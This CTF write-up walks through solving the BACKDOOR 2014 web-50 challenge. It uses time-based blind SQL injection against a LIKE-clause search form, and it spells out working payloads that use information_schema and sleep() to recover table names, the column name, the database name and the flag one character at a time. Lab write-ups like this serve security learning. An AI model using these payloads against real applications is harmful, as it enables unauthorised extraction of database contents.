Tags: sql injection mysql time based information leak 

Rating:


---- Writeup ----
CTF: BACKDOOR 2014
Problem: web-50
Author: Dr.Optix
All rights reserved.
NOTE: Another solution proof made directly from the notes I took while solving
-----------------

This problem starts at:
http://backdoor.cognizance.org.in/problems/web50/search.php

At the first look it seems to be a SQL injection problem.

The source disclosed nothing usefull.

I was unable to cause an error using ' or " as bad injections. Instead I
injected %%%. Because it is doing a search behind the scene I tought I could
make it spit out everything that can be found.

I got this:

Quote    Speaker
Use the Force, Luke.    Obi-Wan Kenobi
Do… or do not. There is no try.    Master Yoda
I find your lack of faith disturbing.    Darth Vader
Fear is the path to the dark side. Fear leads to anger. Anger leads to hate.
Hate leads to suffering.    Master Yoda
You’ve never heard of the Millennium Falcon? … It’s the ship that made the
Kessel run in less than 12 parsecs.    Han Solo
AAARARRRGWWWH.    Chewbacca

In the source I found this after all:
    class="table table-striped">

This makes me think I have only a part of the table. Also I have to do with a
LIKE clause SQL injection.

I should treat the query as something like this:

    SELECT column1, column2
    FROM table1
    WHERE column1 like '%' + @column1 + '%'

I will take a break from this for now.

Back on this one. I will try to bypass LIKE clause on local host first.


    CREATE TABLE mytable(
       id INT NOT NULL AUTO_INCREMENT,
       info VARCHAR(100) NOT NULL,
       PRIMARY KEY ( id )
    );

I found a valid payload construction:
    search=a%' and 1=1 and '%'='

On local I found a building block like this one:
    select table_name from (select table_name from
    information_schema.tables where table_schema=database()) b where
    table_name like "m%" and sleep(5)

I'm starting to get fustrated. Maybe I should go with sqlmap. Not yet tho.

I found the correct building block:
    %%%' and (select table_name from information_schema.tables where
    table_schema=database() and table_name like "m%" and sleep(2)) and
    '%'='

Complete payload schema:
    search=%%%' and (select table_name from information_schema.tables
    where table_schema=database() and table_name like "the_f%" and sleep
    (2)) and '%'='

Potential table names obtained with the above payload schema:
    qu
    the_flag_is_over_here

I found the table "the_flag_is_over_here", by hand. Now I have to extract
it's columns.

To find column names I have to use information_schema.columns. To get the
columns of a particular table I have to use:

select column_name from information_schema.columns where table_name="mytable";

Now I have to use that with the payload building block.

I have an idea how to find the column number for the "the_flag_is_over_here"
table. Using this:

    select * from (select count(*) as count from
    information_schema.columns where
    table_name="mytable") t where t.count = 1 and sleep(2);

The new payload looks like this:
    %%%' and (select * from (select count(*) as count from     
    information_schema.columns where table_name="mytable") t where
    t.count = 2 and sleep(2)) and '%'='

As expected the table has one column, probably with the name of "flag".

To make sure of the name I should use information_schema.columns to get at
least the first and the second letters from the column name.

New payload for finding column name or at least a few letters.

First letter is "t".
Last letter is "e".

For easy manual search the new payload is:
    search=%%%' and (select c from (select column_name as c from     
    information_schema.columns where table_name="the_flag_is_over_here"
    limit 1) t where c like concat("t", char(1),"%") and sleep(5)) and
    '%'='

Potential name: tw..e
Potential name: tw..e
Potential name: twi..e
Potential name: twisted..e
Potential name: twisted_b..e
Potential name: twisted..e
Potential name: twisted_..e
Potential name: twisted_..ame
Potential name: twisted_..name
Potential name: twisted_name
Potential name: twisted_column_name

Bingo! That's the column name.

Payload that will demonstrate this is the column name:
    search=%%%' and (select c from (select column_name as c from     
    information_schema.columns where table_name="the_flag_is_over_here"
    limit 1) t where c like concat("twisted_column_name") and sleep(5))
    and '%'='

Now let's extract the info.

Damit i need the database name. Maybe I can concat it.

Payload building block for database name extraction:

    search=%%%' and (select c from (select table_schema as c from
    information_schema.tables where table_name="the_flag_is_over_here"
    limit 1) t where c like concat("s", char(97), "%") and sleep(5)) and
    '%'='

Database name: sqli_db

Payload building block for flag extraction:

    search=%%%' and (select twisted_column_name from
    sqli_db.the_flag_is_over_here where twisted_column_name like concat
    ("", char(51),"%") and sleep(5)) and '%'='

Partial flag: D 5 A B | A F 3 9 | 1 F 7 B | C 7 E 7 |

Extracted flag:
D 5 A B | A F 3 9 | 1 F 7 B | C 7 E 7 |
C D A 8 | C 1 2 8 | E 5 C A | 3 1 8 7

Confirmation:
    search=%%%' and (select twisted_column_name from
    sqli_db.the_flag_is_over_here where twisted_column_name =
    "D5ABAF391F7BC7E7CDA8C128E5CA3187" and sleep(5)) and '%'='

The flag is: D5ABAF391F7BC7E7CDA8C128E5CA3187

~ Q.E.D